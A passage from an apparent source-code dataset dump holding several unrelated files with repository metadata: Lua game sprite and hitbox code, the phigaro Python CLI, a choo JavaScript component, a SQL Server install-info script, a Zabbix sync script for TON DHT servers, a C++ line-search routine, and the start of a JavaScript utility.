    self.spriteSpeed = spriteSpeed
    self.spriteTimer = spriteTimer
    local spritePath = "Sprites/" .. self.character .. self.stance .. self.stanceCount .. ".png"
    self.sprite = love.graphics.newImage(spritePath)
    self.width = self.sprite:getWidth()
    self.height = self.sprite:getHeight()
    self:updateHitbox()
end
-- Switch to a new animation stance, restarting its sprite cycle.
-- Offset files ("OS<character><stance>.txt", two 3-character numeric
-- fields) are applied for the outgoing stance before the switch and
-- un-applied for the incoming stance afterwards, keeping sprites of
-- different sizes visually aligned.  Returns the loop flag produced by
-- the first frame advance.
function Player:updateStance(stance, stanceLimit)
    if love.filesystem.exists("Hitboxes/".."OS"..self.character..self.stance..".txt") then
        local offset = love.filesystem.read("Hitboxes/".."OS"..self.character..self.stance..".txt")
        -- String->number coercion converts the 3-char substrings.
        self.x = self.x + string.sub(offset, 1, 3)
        self.y = self.y + string.sub(offset, 4, 6)
    end
    self.stance = stance
    self.stanceLimit = stanceLimit
    -- Reset to 0 so incrementSprite lands on frame 1.
    self.stanceCount = 0
    local spriteLoop = self:incrementSprite()
    self:updateHitbox()
    if love.filesystem.exists("Hitboxes/".."OS"..self.character..self.stance..".txt") then
        local offset = love.filesystem.read("Hitboxes/".."OS"..self.character..self.stance..".txt")
        self.x = self.x - string.sub(offset, 1, 3)
        self.y = self.y - string.sub(offset, 4, 6)
    end
    return spriteLoop
end
-- Advance to the next animation frame, wrapping back to frame 1 past
-- stanceLimit.  Returns true exactly when the final frame was reached.
function Player:incrementSprite()
    self.stanceCount = self.stanceCount + 1
    if self.stanceCount > self.stanceLimit then
        self.stanceCount = 1
    end
    -- Keep the sprite's feet anchored: remember the old bottom edge and
    -- re-derive y after the (possibly differently sized) frame loads.
    local bottom = self.y + self.height
    self.sprite = love.graphics.newImage("Sprites/" .. self.character .. self.stance .. self.stanceCount .. ".png")
    self.width = self.sprite:getWidth()
    self.height = self.sprite:getHeight()
    self.y = bottom - self.height
    return self.stanceCount == self.stanceLimit
end
-- Recompute the collision rectangle for the current sprite frame.
-- "HB<character><stance><frame>.txt" holds four 3-character numeric
-- fields (insets from left, top, right, bottom - presumably; confirm
-- against the data files); Lua's string->number coercion converts the
-- substrings.  Without a hitbox file the full sprite rectangle is used.
function Player:updateHitbox()
    if love.filesystem.exists("Hitboxes/".."HB"..self.character..self.stance..self.stanceCount..".txt") then
        local hitbox = love.filesystem.read("Hitboxes/".."HB"..self.character..self.stance..self.stanceCount..".txt")
        self.hitX = self.x + string.sub(hitbox, 1, 3)
        self.hitY = self.y + string.sub(hitbox, 4, 6)
        self.hitWidth = self.width - string.sub(hitbox, 7, 9) - string.sub(hitbox, 1, 3)
        self.hitHeight = self.height - string.sub(hitbox, 10, 12) - string.sub(hitbox, 4, 6)
    else
        self.hitX = self.x
        self.hitY = self.y
        self.hitWidth = self.width
        self.hitHeight = self.height
    end
end
function Player:hitTest(enemy)
return self.hitX < enemy.hitX + enemy.hitWidth and enemy.hitX < self.hitX + self.hitWidth and self.hitY < enemy.hitY + enemy.hitHeight and enemy.hitY < self.hitY + self.hitHeight
end | 35.773333 | 179 | 0.723444 | 3.28125 |
0cdb931bc3d4d0011e0c24642dc040bbe2b51af1 | 8,924 | py | Python | phigaro/cli/batch.py | bobeobibo/phigaro | 342a3454bb5324426b25feb4a4d1f640b58bf8f8 | [
"MIT"
] | 31 | 2019-03-06T14:33:37.000Z | 2022-03-08T07:16:07.000Z | phigaro/cli/batch.py | bobeobibo/phigaro | 342a3454bb5324426b25feb4a4d1f640b58bf8f8 | [
"MIT"
] | 27 | 2019-05-17T05:06:58.000Z | 2022-03-27T00:38:56.000Z | phigaro/cli/batch.py | bobeobibo/phigaro | 342a3454bb5324426b25feb4a4d1f640b58bf8f8 | [
"MIT"
] | 12 | 2017-08-23T12:48:38.000Z | 2021-06-24T00:57:22.000Z | from __future__ import absolute_import
import argparse
import logging
import multiprocessing
import os
import sys
import uuid
from os.path import join, exists
import yaml
from phigaro.context import Context
from phigaro.batch.runner import run_tasks_chain
from phigaro.batch.task.path import sample_name
from phigaro.batch.task.prodigal import ProdigalTask
from phigaro.batch.task.hmmer import HmmerTask
from phigaro.batch.task.dummy import DummyTask
from phigaro.batch.task.preprocess import PreprocessTask
from phigaro.batch.task.run_phigaro import RunPhigaroTask
from phigaro._version import __version__
def parse_substitute_output(subs):
    """Parse ``-S/--substitute-output`` values of the form ``task:path``.

    :param subs: list of ``'<task_name>:<output_path>'`` strings, or None.
    :returns: dict mapping each task name to a DummyTask wrapping its path.
    """
    res = {}
    for sub in subs or []:
        # Split on the first ':' only, so output paths may themselves
        # contain colons (plain split(":") raised ValueError on them).
        task_name, output = sub.split(":", 1)
        res[task_name] = DummyTask(output, task_name)
    return res
def create_task(substitutions, task_class, *args, **kwargs):
    """Build a ``task_class`` instance, honouring any user substitution.

    When a substitute task is registered under the new task's name, the
    substitution is announced and the substitute is returned instead of
    the freshly constructed task.
    """
    # TODO: refactor to class Application
    task = task_class(*args, **kwargs)
    substitute = substitutions.get(task.task_name)
    if substitute is None:
        return task
    print(
        'Substituting output for {}: {}'.format(
            task.task_name, substitute.output()
        )
    )
    return substitute
def clean_fold(fold='proc'):
    """Remove the temporary working folder if it contains no files.

    The folder (with any nested sub-folders) is deleted only when the whole
    tree is file-free; a single remaining file keeps the tree intact.
    Does nothing when the folder does not exist (the original implementation
    raised FileNotFoundError on the final ``os.rmdir`` in that case).

    :param fold: path of the temporary folder; defaults to 'proc' to stay
        backward compatible with existing callers.
    """
    if not os.path.isdir(fold):
        return
    # Any file anywhere in the tree means we must keep everything.
    has_files = any(files for _, _, files in os.walk(fold))
    if has_files:
        return
    # Bottom-up walk so children are removed before their parents.
    for root, dirs, _ in os.walk(fold, topdown=False):
        for name in dirs:
            os.rmdir(os.path.join(root, name))
    os.rmdir(fold)
def main():
    """Command-line entry point: parse arguments, assemble the run
    configuration and execute the Phigaro task chain."""
    default_config_path = join(os.getenv('HOME'), '.phigaro', 'config.yml')

    parser = argparse.ArgumentParser(
        prog='phigaro',
        description='Phigaro is a scalable command-line tool for predicting phages and prophages '
        'from nucleic acid sequences',
    )
    parser.add_argument(
        '-V',
        '--version',
        action='version',
        version='%(prog)s {version}'.format(version=__version__),
    )
    parser.add_argument(
        '-f',
        '--fasta-file',
        help='Assembly scaffolds/contigs or full genomes, required',
        required=True,
    )
    parser.add_argument(
        '-c',
        '--config',
        default=default_config_path,
        help='Path to the config file, not required. The default is %s' % default_config_path,
    )
    parser.add_argument(
        '-v', '--verbose', action='store_true', help=argparse.SUPPRESS
    )
    parser.add_argument(
        '-p',
        '--print-vogs',
        help='Print phage vogs for each region',
        action='store_true',
    )
    parser.add_argument(
        '-e',
        '--extension',
        default=['html'],
        nargs='+',
        help='Type of the output: html, tsv, gff, bed or stdout. Default is html. You can specify several file formats with a space as a separator. Example: -e tsv html stdout.',
    )
    parser.add_argument(
        '-o',
        '--output',
        default='',
        help='Output filename for html and txt outputs. Required by default, but not required for stdout only output.',
    )
    parser.add_argument(
        '--not-open',
        help='Do not open html file automatically, if html output type is specified.',
        action='store_true',
    )
    parser.add_argument(
        '-t',
        '--threads',
        type=int,
        default=multiprocessing.cpu_count(),
        help='Num of threads ('
        'default is num of CPUs={})'.format(multiprocessing.cpu_count()),
    )
    parser.add_argument(
        '--no-cleanup', action='store_true', help="Do not delete any temporary files that was generated by Phigaro (HMMER & Prodigal outputs and some others)."
    )
    parser.add_argument(
        '-S',
        '--substitute-output',
        action='append',
        help='If you have precomputed prodigal and/or hmmer data you can provide paths to the files in the following format: program:address/to/the/file. In place of program you should write hmmer or prodigal. If you need to provide both files you should pass them separately as two parameters.',
    )
    parser.add_argument(
        '--save-fasta',
        action='store_true',
        help='Save all phage fasta sequences in a fasta file.',
    )
    parser.add_argument(
        '-d',
        '--delete-shorts',
        action='store_true',
        help='Exclude sequences with length < 20000 automatically.',
    )
    parser.add_argument(
        '-m',
        '--mode',
        default='basic',
        help='You can launch Phigaro at one of 3 modes: basic, abs, without_gc. Default is basic. Read more about modes at https://github.com/bobeobibo/phigaro/',
    )
    parser.add_argument(
        '--wtp',
        action='store_true',
        help=argparse.SUPPRESS
    )
    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO if args.verbose else logging.WARN)
    logging.getLogger('sh.command').setLevel(logging.WARN)
    logger = logging.getLogger(__name__)

    if not exists(args.config):
        # TODO: pretty message
        print('Please, create config file using phigaro-setup script')
        sys.exit(1)

    # Normalise and validate the requested output formats.
    args.extension = [atype.lower() for atype in args.extension]
    for ext in args.extension:
        if ext not in ('html', 'gff', 'bed', 'tsv', 'stdout'):
            print(
                'Error! The unknown output format in -e/--extension parameter: %s. Please, choose one or several from the list: html, gff, bed, tsv, stdout' % ext
            )
            sys.exit(1)
    if (args.output == '') and (args.extension != ['stdout']):
        print(
            'Error! Argument -o/--output is required or change the type of the output to stdout.'
        )
        sys.exit(1)

    with open(args.config) as f:
        logger.info('Using config file: {}'.format(args.config))
        config = yaml.load(f, Loader=yaml.FullLoader)

    # Fold the command-line options into the 'phigaro' config section.
    config['phigaro']['wtp'] = args.wtp
    config['phigaro']['print_vogs'] = args.print_vogs
    config['phigaro']['filename'] = args.fasta_file
    config['phigaro']['no_html'] = 'html' not in args.extension
    config['phigaro']['not_open'] = args.not_open
    config['phigaro']['output'] = (
        args.output + '/' + os.path.splitext(os.path.basename(args.fasta_file))[0] + '.phigaro'
    ).replace('//', '/')
    config['phigaro']['uuid'] = uuid.uuid4().hex
    config['phigaro']['delete_shorts'] = args.delete_shorts
    config['phigaro']['gff'] = 'gff' in args.extension
    config['phigaro']['bed'] = 'bed' in args.extension
    config['phigaro']['mode'] = args.mode
    config['phigaro']['save_fasta'] = args.save_fasta
    filename = args.fasta_file
    sample = '{}-{}'.format(sample_name(filename), config['phigaro']['uuid'])

    # "What the Phage" (wtp) integration forces a fixed set of outputs/paths.
    if args.wtp:
        config['phigaro']['not_open'] = True
        config['phigaro']['gff'] = True
        config['phigaro']['bed'] = True
        args.extension.append('tsv')
        config['phigaro']['delete_shorts'] = True
        config['phigaro']['print_vogs'] = True
        config['phigaro']['output_wtp'] = args.output + '/phigaro.txt'
        config['phigaro']['output'] = args.output + '/phigaro/phigaro'
        config['phigaro']['save_fasta'] = True

    # Make sure the output folders exist before any task writes to them.
    if config['phigaro']['output'] != '':
        fold = os.path.dirname(config['phigaro']['output'])
        if fold and not os.path.isdir(fold):
            os.makedirs(fold)
    if args.wtp:
        fold = os.path.dirname(config['phigaro']['output_wtp'])
        if fold and not os.path.isdir(fold):
            os.makedirs(fold)

    Context.initialize(
        sample=sample, config=config, threads=args.threads,
    )

    # Build the task chain, honouring any -S/--substitute-output overrides.
    substitutions = parse_substitute_output(args.substitute_output)
    preprocess_task = create_task(substitutions, PreprocessTask, filename)
    prodigal_task = create_task(
        substitutions, ProdigalTask, preprocess_task=preprocess_task
    )
    hmmer_task = create_task(
        substitutions, HmmerTask, prodigal_task=prodigal_task
    )
    run_phigaro_task = create_task(
        substitutions,
        RunPhigaroTask,
        prodigal_task=prodigal_task,
        hmmer_task=hmmer_task,
    )
    tasks = [preprocess_task, prodigal_task, hmmer_task, run_phigaro_task]
    task_output_file = run_tasks_chain(tasks)

    # Emit the result table.  The original implementation closed sys.stdout
    # after printing and leaked the tsv file handle when both formats were
    # requested; write each target independently instead.
    if ('tsv' in args.extension) or ('stdout' in args.extension):
        with open(task_output_file) as f:
            result_lines = list(f)
        if 'tsv' in args.extension:
            with open(config['phigaro']['output'] + '.tsv', 'w') as out_f:
                out_f.writelines(result_lines)
        if 'stdout' in args.extension:
            sys.stdout.writelines(result_lines)

    if not args.no_cleanup:
        for t in tasks:
            t.clean()
        clean_fold()
if __name__ == '__main__':
main()
| 33.174721 | 296 | 0.61766 | 3.15625 |
0bbd15397e2bf4ae4b6fd74045457ace7aa1b36b | 1,538 | js | JavaScript | components/content.js | isabella232/minidocs | 17b8b2527ad2e63f515e23101ed45325605f9d54 | [
"MIT"
] | 153 | 2016-03-27T07:56:56.000Z | 2022-03-12T23:33:14.000Z | components/content.js | freeman-lab/documentation-time | 44a9929c27595a6bea83dddec6f2ca45287bac70 | [
"MIT"
] | 67 | 2016-03-29T01:03:07.000Z | 2017-07-23T23:06:34.000Z | components/content.js | freeman-lab/documentation-time | 44a9929c27595a6bea83dddec6f2ca45287bac70 | [
"MIT"
] | 23 | 2016-03-27T17:43:20.000Z | 2018-11-30T14:06:17.000Z | var html = require('choo/html')
var css = require('sheetify')
var avatar = require('github-avatar-url')
module.exports = function (state, prev, send) {
var currentPage = state.params.page || state.current
var page = state.html[currentPage]
var pageData = state.contents.filter(function (item) {
return item.key === currentPage
})[0]
var prefix = css('./content.css')
var contentWrapper = html`<div></div>`
contentWrapper.innerHTML = page
var link = pageData.source ? html`<a class="markdown-link" href="${pageData.source}">source</a>` : ''
function contributors (items) {
return items.map(function (item) {
if (!item) return
var user = item.replace('@', '')
var img = html`<img class="${prefix} contributor"></img>`
img.style.opacity = 0
avatar(user, function (err, url) {
if (err) {
// TODO: handle requests in effects, send error messages to state
console.log(err)
}
img.src = url
img.onload = function () {
img.style.opacity = 1
}
})
return html`<div class="${prefix} contributor-wrapper">
<a href='https://github.com/${user}'>
${img}
</a>
</div>`
})
}
if (pageData.contributors) {
var contributorWrapper = html`<div class="${prefix} contributor-container">
${contributors(pageData.contributors)}
</div>`
}
return html`<div class="${prefix} minidocs-content">
${link}
${contributorWrapper}
${contentWrapper}
</div>`
}
| 27.963636 | 103 | 0.60013 | 3.03125 |
93e7bde25b19b5c699d99e5b1d8d5281dccfd8f9 | 2,645 | sql | SQL | source/setup/install-get-instance-info.sql | rentadba/dbaTDPMon | 278b43db2f01c5b0fb2db4dbff8e0c49fb3471b2 | [
"MIT"
] | 31 | 2017-04-06T18:12:10.000Z | 2022-02-28T11:08:41.000Z | source/setup/install-get-instance-info.sql | rentadba/dbaTDPMon | 278b43db2f01c5b0fb2db4dbff8e0c49fb3471b2 | [
"MIT"
] | 1 | 2020-04-27T04:39:27.000Z | 2020-06-19T11:34:51.000Z | source/setup/install-get-instance-info.sql | rentadba/dbaTDPMon | 278b43db2f01c5b0fb2db4dbff8e0c49fb3471b2 | [
"MIT"
] | 10 | 2017-09-25T11:32:57.000Z | 2021-09-10T11:11:50.000Z | -- ============================================================================
-- Copyright (c) 2004-2017 Dan Andrei STEFAN ([email protected])
-- ============================================================================
-- Detect the SQL Server instance version and host platform, then print the
-- instance's default data/log file locations for the install utility.
-- Output lines consumed by the caller: productVersion=, engineVersion=,
-- dataFilePath=, logFilePath=.
SET QUOTED_IDENTIFIER ON
GO
SET NOCOUNT ON
GO

DECLARE @dataFilePath [nvarchar](260)
	, @logFilePath [nvarchar](260)
	, @serverVersionStr [sysname]
	, @serverVersionNum [numeric](9,6)
	, @hostPlatform [sysname]
	, @queryToRun [nvarchar](512)

SELECT @serverVersionStr = CAST(SERVERPROPERTY('ProductVersion') AS [sysname])
PRINT 'productVersion=' + CAST(SERVERPROPERTY('ProductVersion') AS [sysname])
PRINT 'engineVersion=' + SUBSTRING(@serverVersionStr, 1, CHARINDEX('.', @serverVersionStr)-1)
-- Collapse "major.rest" into a single numeric for version comparisons below.
SET @serverVersionNum=SUBSTRING(@serverVersionStr, 1, CHARINDEX('.', @serverVersionStr)-1) + '.' + REPLACE(SUBSTRING(@serverVersionStr, CHARINDEX('.', @serverVersionStr)+1, LEN(@serverVersionStr)), '.', '')

-- SQL Server 2017 (version 14) and later expose the host platform.
IF @serverVersionNum >= 14
	begin
		SET @queryToRun = N'SELECT [host_platform] FROM sys.dm_os_host_info'
		IF object_id('tempdb..#tmpOutput') IS NOT NULL
			DROP TABLE #tmpOutput
		CREATE TABLE #tmpOutput
			(
				[output] [nvarchar](512) NULL
			)
		INSERT INTO #tmpOutput([output])
				EXEC sp_executesql @queryToRun
		SELECT @hostPlatform = LOWER([output])
		FROM #tmpOutput
	end

SET @dataFilePath = REPLACE('$(data_files_path)', '"', '')
-- NOTE(review): the log path is also seeded from $(data_files_path);
-- presumably a dedicated $(log_files_path) sqlcmd variable was intended -
-- confirm against the install utility that invokes this script.
SET @logFilePath = REPLACE('$(data_files_path)', '"', '')

-- The registry fallback only applies to Windows hosts.
IF NOT (@serverVersionNum >= 14 AND @hostPlatform='linux' )
	begin
		/* try to read default data and log file location from registry */
		IF ISNULL(@dataFilePath, '')=''
			EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE'
				, N'Software\Microsoft\MSSQLServer\MSSQLServer'
				, N'DefaultData'
				, @dataFilePath output;
		IF ISNULL(@logFilePath, '')=''
			EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE'
				, N'Software\Microsoft\MSSQLServer\MSSQLServer'
				, N'DefaultLog'
				, @logFilePath output;
	end

IF ISNULL(@dataFilePath, '')='' OR ISNULL(@logFilePath, '')=''
	begin
		RAISERROR('*-----------------------------------------------------------------------------*', 10, 1) WITH NOWAIT
		RAISERROR('Database Default Locations are not set for current SQL Server instance. You must provide them to the install utility.', 16, 1) WITH NOWAIT
	end
ELSE
	begin
		-- Normalise to trailing backslash before printing for the caller.
		IF RIGHT(@dataFilePath, 1)<>'\' SET @dataFilePath = @dataFilePath + '\'
		IF RIGHT(@logFilePath, 1)<>'\' SET @logFilePath = @logFilePath + '\'
		PRINT 'dataFilePath="' + @dataFilePath + '"'
		PRINT 'logFilePath="' + @logFilePath + '"'
	end
GO
e8ff9e109d1e3411f4ef5d970014c1908546fefe | 6,168 | py | Python | support/update_dht_servers.py | sonofmom/ton-zabbix-scripts | b43471d058873c5ba78a92fa79d334380df5f6fc | [
"MIT"
] | null | null | null | support/update_dht_servers.py | sonofmom/ton-zabbix-scripts | b43471d058873c5ba78a92fa79d334380df5f6fc | [
"MIT"
] | null | null | null | support/update_dht_servers.py | sonofmom/ton-zabbix-scripts | b43471d058873c5ba78a92fa79d334380df5f6fc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
import argparse
import Libraries.arguments as ar
import Libraries.tools.general as gt
import Libraries.tools.zabbix as zt
import Classes.AppConfig as AppConfig
import requests
import copy
def run():
    """Synchronise the Zabbix "TON public DHT servers" group with the network config.

    Downloads the global network config, indexes its static DHT nodes by
    "<ip>.<port>", then: adds hosts missing in Zabbix, refreshes the
    {$DHT.KEY} macro on existing hosts, and deletes Zabbix hosts no longer
    present in the config.  Exits the process (0 on success, 1 on error).
    """
    description = 'Fetches list of dht servers from network config and performs sync with zabbix'
    parser = argparse.ArgumentParser(formatter_class = argparse.RawDescriptionHelpFormatter,
                                     description = description)
    ar.set_standard_args(parser, "other")
    cfg = AppConfig.AppConfig(parser.parse_args())
    # Bookkeeping counters.  NOTE(review): "hosts_disabled" is never
    # incremented and deletions are not counted at present.
    stats = {
        "nodes": 0,
        "hosts_known": 0,
        "hosts_updated": 0,
        "hosts_added": 0,
        "hosts_disabled": 0
    }
    cfg.log.log(os.path.basename(__file__), 3, "Fetching network config.")
    try:
        rs = requests.get(cfg.config["configs"]["global_public"]).json()
    except Exception as e:
        cfg.log.log(os.path.basename(__file__), 1, "Could not retrieve network config: " + str(e))
        sys.exit(1)
    if len(rs["dht"]["static_nodes"]["nodes"]) > 0:
        nodes = {}
        # We identify DHT nodes by ip:port combination
        #
        for element in rs["dht"]["static_nodes"]["nodes"]:
            nodes["{}.{}".format(gt.dec2ip(element["addr_list"]["addrs"][0]["ip"]),element["addr_list"]["addrs"][0]["port"])] = element
    else:
        cfg.log.log(os.path.basename(__file__), 1, "Network config contains no nodes")
        sys.exit(1)
    stats["nodes"] = len(nodes)
    cfg.log.log(os.path.basename(__file__), 3, "Retrieved {} DHT servers.".format(stats["nodes"]))
    cfg.log.log(os.path.basename(__file__), 3, "Fetching list of hosts in zabbix.")
    rs = zt.fetch_hosts(cfg, [cfg.config["mapping"]["groups"]["ton_public_dht_servers"]])
    if rs is None:
        cfg.log.log(os.path.basename(__file__), 1, "Could not fetch list of hosts.")
        sys.exit(1)
    # Again, we identify hosts by ip:port; hosts without a {$DHT.PORT}
    # macro cannot be keyed and are ignored.
    hdata = {}
    for element in rs:
        port = next((chunk for chunk in element["macros"] if chunk["macro"] == "{$DHT.PORT}"), None)
        if port:
            hdata["{}.{}".format(element["interfaces"][0]["ip"], port["value"])] = element
    stats["hosts_known"] = len(hdata)
    cfg.log.log(os.path.basename(__file__), 3, "Retrieved {} hosts.".format(stats["hosts_known"]))
    # Scan nodes from network config, add or update key as needed
    #
    for element in nodes:
        if element not in hdata:
            # 2130706433 is 127.0.0.1: loopback entries are never registered.
            if nodes[element]["addr_list"]["addrs"][0]["ip"] != 2130706433:
                cfg.log.log(os.path.basename(__file__), 3, "Adding node {}.".format(element))
                rs = add_node(cfg,nodes[element])
                if not rs:
                    cfg.log.log(os.path.basename(__file__), 1, "Could not add host.")
                    sys.exit(1)
                stats["hosts_added"] += 1
        else:
            # Mutate a deep copy so a plain != comparison against the
            # original tells us whether an API update call is needed.
            host = copy.deepcopy(hdata[element])
            key = next((chunk for chunk in host["macros"] if chunk["macro"] == "{$DHT.KEY}"), None)
            if not key or key["value"] != nodes[element]["id"]["key"]:
                zt.set_macro(host["macros"], "{$DHT.KEY}", str(nodes[element]["id"]["key"]))
            if host != hdata[element]:
                cfg.log.log(os.path.basename(__file__), 3, "Updating node {}.".format(element))
                zt.update_host(cfg, host, hdata[element])
                stats["hosts_updated"] += 1
    # Scan nodes from zabbix, remove if unknown
    #
    for host in hdata:
        if host not in nodes:
            zt.delete_host(cfg, hdata[host])
    sys.exit(0)
def add_node(cfg, server_data):
    """Create a Zabbix host for one DHT node via the host.create API call.

    :param cfg: application config/logger wrapper.
    :param server_data: one node entry from the network config's
        dht.static_nodes.nodes list.
    :returns: the new Zabbix host id; exits the process on API failure.
    """
    cfg.log.log(os.path.basename(__file__), 3, "Adding host with KEY {}".format(server_data["id"]["key"]))
    groups = [
        cfg.config["mapping"]["groups"]["ton_public_dht_servers"]
    ]
    templates = [
        cfg.config["mapping"]["templates"]["ton_dht_server"]
    ]
    payload = {
        "jsonrpc": "2.0",
        "method": "host.create",
        "params": {
            "host": "TON DHT node {}.{}".format(gt.dec2ip(server_data["addr_list"]["addrs"][0]["ip"]),server_data["addr_list"]["addrs"][0]["port"]),
            # NOTE(review): type 1 / port "10050" look like Zabbix agent
            # interface defaults - confirm against the Zabbix API docs.
            "interfaces":
                [
                    {
                        "type": 1,
                        "main": 1,
                        "useip": 1,
                        "ip": gt.dec2ip(server_data["addr_list"]["addrs"][0]["ip"]),
                        "dns": "",
                        "port": "10050"
                    }
                ],
            "tags": [
                {
                    "tag": "c_network",
                    "value": cfg.config["net"]
                },
                {
                    "tag": "c_stage",
                    "value": "prod"
                },
                {
                    "tag": "c_origin",
                    "value": "dht_sync"
                }
            ],
            # Per-host macros recorded on the new host.
            "macros":
                [
                    {
                        "macro": "{$DHT.KEY}",
                        "value": server_data["id"]["key"]
                    },
                    {
                        "macro": "{$DHT.PORT}",
                        "value": str(server_data["addr_list"]["addrs"][0]["port"])
                    },
                    {
                        "macro": "{$UPDATED}",
                        "value": str(gt.get_timestamp())
                    }
                ],
            "groups": [],
            "templates": []
        },
        "auth": cfg.config["zabbix"]["api_token"],
        "id": 1
    }
    # host.create expects lists of {"groupid": id} / {"templateid": id} objects.
    for element in groups:
        payload["params"]["groups"].append({"groupid": element})
    for element in templates:
        payload["params"]["templates"].append({"templateid": element})
    rs = zt.execute_api_query(cfg, payload)
    if not rs:
        cfg.log.log(os.path.basename(__file__), 1, "Failed to add host with KEY {}".format(server_data["id"]["key"]))
        sys.exit(1)
    return rs["result"]["hostids"][0]
if __name__ == '__main__':
run()
| 35.245714 | 148 | 0.50989 | 3.03125 |
5fdc0fbffb5e43fca9e409204dc1c6d3691508eb | 1,978 | h | C | frees/search.h | fenollp/lk | 14ed9cb1997906c9af2711ce03ce07b31c284349 | [
"BSD-3-Clause"
] | 24 | 2017-08-01T16:13:28.000Z | 2021-08-29T13:13:29.000Z | frees/search.h | fenollp/lk | 14ed9cb1997906c9af2711ce03ce07b31c284349 | [
"BSD-3-Clause"
] | 10 | 2017-07-13T17:31:21.000Z | 2021-06-18T21:32:15.000Z | frees/search.h | fenollp/lk | 14ed9cb1997906c9af2711ce03ce07b31c284349 | [
"BSD-3-Clause"
] | 26 | 2017-09-17T00:29:31.000Z | 2022-03-17T04:25:54.000Z |
// Evaluate func(x, f, n) and return one half of the sum of the squared
// residuals stored in f (the merit value used by the line search below).
template< typename Real, typename F >
Real fminsum ( Real *x, Real *f, const int n, F &func )
{
	func(x, f, n);
	Real sumOfSquares = 0;
	for (int i = 0; i < n; ++i)
	{
		const Real fi = f[i];
		sumOfSquares += fi * fi;
	}
	return 0.5*sumOfSquares;
}
// Backtracking line search (Numerical Recipes "lnsrch" style).
//
// Given a point xold with merit value fold and gradient g, find a step
// length along the descent direction p such that the merit
// f = fminsum(x, fvec, n, func) at x = xold + alam*p shows sufficient
// decrease (Armijo condition with constant ALF).  On output x holds the
// new point, f its merit value and fvec the residuals there.
//
// Side effect: p is rescaled in place when its norm exceeds stpmax.
// Returns false when p is not a descent direction, when the merit turns
// NaN, or when the iteration budget is exhausted.  check is set to true
// when the step shrank below the machine-precision threshold alamin
// (the caller should then verify convergence on x itself).
template< typename Real, typename F >
bool search( Real *xold, const Real fold, Real *g, Real *p,
	Real *x, Real &f, const Real stpmax, bool &check, F &func, Real *fvec,
	const int n)
{
	const Real ALF=1.0e-4, TOLX = std::numeric_limits<Real>::epsilon();
	Real a,alam,alam2=0.0,alamin,b,disc,f2=0.0;
	Real rhs1,rhs2,slope=0.0,sum=0.0,temp,test,tmplam;
	int i;
	check = false;
	for (i=0;i<n;i++)
		sum += p[i]*p[i];
	sum=sqrt(sum);
	// Cap the step so |p| never exceeds stpmax (rescales p in place).
	if (sum > stpmax)
		for (i=0;i<n;i++)
			p[i] *= stpmax/sum;
	// Directional derivative of the merit function along p.
	for (i=0;i<n;i++)
		slope += g[i]*p[i];
	if (slope >= 0.0)
		return false; // p is not a descent direction
	// Smallest meaningful step length relative to the magnitude of xold.
	test=0.0;
	for (i=0;i<n;i++)
	{
		temp=fabs(p[i])/mymax(fabs(xold[i]),1.0);
		if (temp > test) test=temp;
	}
	alamin=TOLX/test;
	alam=1.0; // always attempt the full step first
	int niter = 0;
	int niter_max = 5000;
	while (niter++ < niter_max)
	{
		for (i=0;i<n;i++)
			x[i]=xold[i]+alam*p[i];
		f = fminsum<Real, F>( x, fvec, n, func );
		if ( (f) != (f) ) // NaN check: only NaN compares unequal to itself
			return false;
		if (alam < alamin)
		{
			// Step underflow: x is numerically xold; report via check.
			for (i=0;i<n;i++) x[i]=xold[i];
			check=true;
			return true;
		}
		else if (f <= fold+ALF*alam*slope)
		{
			return true; // sufficient decrease achieved
		}
		else
		{
			if (alam == 1.0)
			{
				// First backtrack: minimise a quadratic model of the merit.
				tmplam = -slope/(2.0*(f-fold-slope));
			}
			else
			{
				// Later backtracks: cubic model from the last two trials.
				rhs1=f-fold-alam*slope;
				rhs2=f2-fold-alam2*slope;
				a=(rhs1/(alam*alam)-rhs2/(alam2*alam2))/(alam-alam2);
				b=(-alam2*rhs1/(alam*alam)+alam*rhs2/(alam2*alam2))/(alam-alam2);
				if (a == 0.0)
				{
					tmplam = -slope/(2.0*b);
				}
				else
				{
					disc=b*b-3.0*a*slope;
					if (disc < 0.0) tmplam=0.5*alam;
					else if (b <= 0.0) tmplam=(-b+sqrt(disc))/(3.0*a);
					else tmplam=-slope/(b+sqrt(disc));
				}
				if (tmplam>0.5*alam)
					tmplam=0.5*alam; // never grow the trial step
			}
		}
		alam2=alam;
		f2 = f;
		// Shrink by at most a factor of 10 per iteration.
		alam=mymax(tmplam,0.1*alam);
	}
	// Iteration budget exhausted without satisfying any acceptance test.
	// BUGFIX: the original tested `niter == niter_max` here, but the
	// post-increment loop condition leaves niter == niter_max + 1 on
	// exhaustion, so failure was misreported as success.  The only way to
	// reach this point is exhaustion, so report failure unconditionally.
	return false;
}
9bcbc2d477d9df313e29b83b597bdeb68ddfb426 | 3,786 | js | JavaScript | examples/plain-js/index.js | RoamDirectories/ioffice-floor-viewer-sdk | f3af7696dec986d3d3c9f2c9401093dfaee0c02d | [
"MIT"
] | null | null | null | examples/plain-js/index.js | RoamDirectories/ioffice-floor-viewer-sdk | f3af7696dec986d3d3c9f2c9401093dfaee0c02d | [
"MIT"
] | null | null | null | examples/plain-js/index.js | RoamDirectories/ioffice-floor-viewer-sdk | f3af7696dec986d3d3c9f2c9401093dfaee0c02d | [
"MIT"
] | null | null | null | // Utility objects to interact with the DOM
var ping = {};
var select = {};
var setMarkers = {};
/**
* Return an object containing the query parameters.
*/
/**
 * Parse the query string of a URL into a plain object of decoded
 * key/value pairs.
 *
 * @param {string} [url] - URL to parse; defaults to the current location,
 *   preserving the original zero-argument call sites.
 * @returns {Object} decoded query parameters (empty when there is no '?').
 */
function getQueryParams(url = window.location.href) {
  const query = {};
  const queryStart = url.lastIndexOf('?');
  // The original parsed the whole URL when '?' was absent; return {} instead.
  if (queryStart === -1) {
    return query;
  }
  url.slice(queryStart + 1).split('&').forEach(function (item) {
    if (item === '') {
      return;
    }
    // Split on the first '=' only, so values may themselves contain '='.
    const eq = item.indexOf('=');
    const key = eq === -1 ? item : item.slice(0, eq);
    // A missing value decodes to '' rather than the string "undefined".
    const value = eq === -1 ? '' : item.slice(eq + 1);
    query[decodeURIComponent(key)] = decodeURIComponent(value);
  });
  return query;
}
/**
* Wrapper function to obtain the user credentials based on the username/password or oauth token.
* Failure to provide those query parameters will throw an error.
*
